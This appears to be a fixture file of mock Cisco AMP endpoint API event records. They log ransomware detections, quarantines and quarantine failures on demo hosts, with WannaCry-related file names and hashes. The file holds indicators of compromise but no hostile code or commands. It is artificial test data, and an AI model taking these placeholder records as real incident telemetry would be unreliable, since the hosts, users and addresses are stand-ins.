found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 